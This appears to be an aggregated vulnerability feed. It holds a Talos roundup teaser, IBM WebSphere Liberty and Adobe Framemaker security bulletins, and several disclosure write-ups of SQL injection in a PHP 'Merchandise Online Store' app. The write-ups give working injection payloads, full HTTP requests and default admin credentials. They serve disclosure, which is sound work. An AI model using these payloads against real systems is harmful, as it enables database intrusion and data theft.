Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 6 and May 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics,...


[[ This is only the beginning! Please visit the blog for the complete entry ]]

Threat Roundup for May 6 to May 13

IBM WebSphere Application Server Liberty 17.0.0.3 through 22.0.0.5 , with the adminCenter-1.0 feature configured, could allow an authenticated user to issue a request to obtain the status of HTTP/HTTPS ports which are accessible by the application server. IBM X-Force ID: 222078.

**Security Bulletin**

  

**Summary**

IBM WebSphere Application Server Liberty is vulnerable to an information disclosure with the adminCenter-1.0 feature enabled. This has been addressed.

**Vulnerability Details**

**CVEID:**   CVE-2022-22393  
**DESCRIPTION:**   IBM WebSphere Application Server Liberty, with the adminCenter-1.0 feature configured, could allow an authenticated user to issue a request to obtain the status of HTTP/HTTPS ports which are accessible by the application server.  
CVSS Base score: 3.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/222078 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM WebSphere Application Server Liberty

17.0.0.3-22.0.0.5

**Remediation/Fixes**

IBM strongly recommends addressing the vulnerability now by applying a currently available interim fix or fix pack that contains the APAR PH45086. To determine if a feature is enabled for IBM WebSphere Application Server Liberty, refer to How to determine if Liberty is using a specific feature. 

**For IBM WebSphere Application Server Liberty 17.0.0.3 - 22.0.0.5 using the adminCenter-1.0 feature:**   
· Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix PH45086  
\--OR--  
· Apply Liberty Fix Pack 22.0.0.6 or later (targeted availability 2Q2022).

Additional interim fixes may be available and linked off the interim fix download page.

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

12 May 2022: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSEQTP","label":"WebSphere Application Server"},"Component":"Liberty","Platform":\[{"code":"PF002","label":"AIX"},{"code":"PF010","label":"HP-UX"},{"code":"PF012","label":"IBM i"},{"code":"PF016","label":"Linux"},{"code":"PF027","label":"Solaris"},{"code":"PF033","label":"Windows"},{"code":"PF035","label":"z\\/OS"},{"code":"PF017","label":"Mac OS"}\],"Version":"Liberty","Edition":"Liberty","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2022-22393: Security Bulletin: IBM WebSphere Application Server Liberty is vulnerable to an Information Disclosure (CVE-2022-22393)

Adobe Framemaker versions 2029u8 (and earlier) and 2020u4 (and earlier) are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security Updates Available for Adobe Framemaker | APSB22-27

Bulletin ID

Date Published

Priority

APSB22-27

May 10, 2022      

3

**Summary**

Adobe has released a security update for Adobe Framemaker. This update addresses one important and multiple critical vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak.              

**Affected Versions**

**Product**

**Version**

**Platform**

Adobe Framemaker  

2019 Release Update 8  
and earlier  

Windows

Adobe Framemaker  

2020 Release Update 4 and earlier      

Windows  

**Solution**

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:

Product

Version

Platform

Priority

Availability

Adobe Framemaker  

2019 Update 8 (hotfix) 

Windows  

3

Tech note  

Adobe Framemaker

2020 Update 4 (hotfix)  

Windows  

3

Tech note  

**Vulnerability details**

Vulnerability Category

Vulnerability Impact

Severity

**CVSS base score**   

**CVSS vector**  

CVE Numbers

Out-of-bounds Write

(CWE-787)

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28821  

Out-of-bounds Write

(CWE-787)

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28822  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28823  

Use After Free (CWE-416)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28824  

Out-of-bounds Write

(CWE-787)

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28825  

Out-of-bounds Write

(CWE-787)  

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28826  

Out-of-bounds Write

(CWE-787)

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28827  

Out-of-bounds Write

(CWE-787)

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28828  

Out-of-bounds Write

(CWE-787)

Arbitrary code execution  

Critical

7.8

CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

CVE-2022-28829  

Out-of-bounds Read (CWE-125)  

Memory Leak

Important

5.5

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N  

CVE-2022-28830  

**Acknowledgments**

Adobe would like to thank the following Initiative for reporting the relevant issues and for working with Adobe to help protect our customers:

*   Mat Powell of Trend Micro Zero Day Initiative (CVE-2022-28821, CVE-2022-28822, CVE-2022-28823, CVE-2022-28824, CVE-2022-28825, CVE-2022-28826, CVE-2022-28827, CVE-2022-28828, CVE-2022-28829, CVE-2022-28830)

**Revisions**

January 05, 2022: Tech Note linked to proper page

September 22, 2021: Included details for CVE-2021-39862 and CVE-2021-39865.  

For more information, visit https://helpx.adobe.com/security.html, or email PSIRT@adobe.com

CVE-2022-28830: Adobe Security Bulletin

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/?p=view_product&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/?p=view\_product&id=

Vulnerability location: /vloggers\_merch/?p=view\_product&id=,id

\[+\] Payload: /vloggers\_merch/?p=view\_product&id=a87ff679a2f3e71d9181a67b7542122c%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/?p\=view\_product&id\=a87ff679a2f3e71d9181a67b7542122c%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 29830 

When length (database ()) = 17, Content-Length: 26131

CVE-2022-30401: bug_report/SQLi-14.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/admin/orders/view_order.php?view=user&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/admin/orders/view\_order.php?view=user&id=

Vulnerability location: /vloggers\_merch/admin/orders/view\_order.php?view=user&id=,id

\[+\] Payload: /vloggers\_merch/admin/orders/view\_order.php?view=user&id=2%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/admin/orders/view\_order.php?view\=user&id\=2%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 4252 

When length (database ()) = 17, Content-Length: 2510

CVE-2022-30400: bug_report/SQLi-13.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/admin/?page=maintenance/manage_category&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/admin/?page=maintenance/manage\_category&id=

Vulnerability location: /vloggers\_merch/admin/?page=maintenance/manage\_category&id=,id

\[+\] Payload: /vloggers\_merch/admin/?page=maintenance/manage\_category&id=2%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/admin/?page\=maintenance/manage\_category&id\=2%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 26268 

When length (database ()) = 17, Content-Length: 26317

CVE-2022-30399: bug_report/SQLi-11.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/admin/?page=orders/view_order&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/admin/?page=orders/view\_order&id=

Vulnerability location: /vloggers\_merch/admin/?page=orders/view\_order&id=,id

\[+\] Payload: /vloggers\_merch/admin/?page=orders/view\_order&id=2%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/admin/?page\=orders/view\_order&id\=2%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 27212 

When length (database ()) = 17, Content-Length: 25470

CVE-2022-30398: bug_report/SQLi-10.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/admin/?page=inventory/manage_inventory&id=.

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

Author： k0xx

The password for the backend login account is: admin/admin123

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/admin/?page=inventory/manage\_inventory&id=

Vulnerability location: /vloggers\_merch/admin/?page=inventory/manage\_inventory&id=,id

\[+\] Payload: /vloggers\_merch/admin/?page=inventory/manage\_inventory&id=5%27%20and%20length(database())%20=17--+ // Leak place ---> id

Current database name: vloggers\_merch\_db,length is 17

GET /vloggers\_merch/admin/?page\=inventory/manage\_inventory&id\=5%27%20and%20length(database())%20\=17\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close

When length (database ()) = 16, Content-Length: 26978

When length (database ()) = 17, Content-Length: 26988

CVE-2022-30396: bug_report/SQLi-9.md at main · k0xx11/bug_report

Merchandise Online Store v1.0 is vulnerable to SQL Injection via /vloggers_merch/classes/Master.php?f=delete_cart.

Permalink

Cannot retrieve contributors at this time

**Merchandise Online Store v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability File: /vloggers\_merch/classes/Master.php?f=delete\_cart

Vulnerability location: /vloggers\_merch/classes/Master.php?f=delete\_cart, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /vloggers\_merch/classes/Master.php?f\=delete\_cart HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Cookie: PHPSESSID=n23o4bgngdq5q3js6l0a0i6r6k
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

Tag

#windows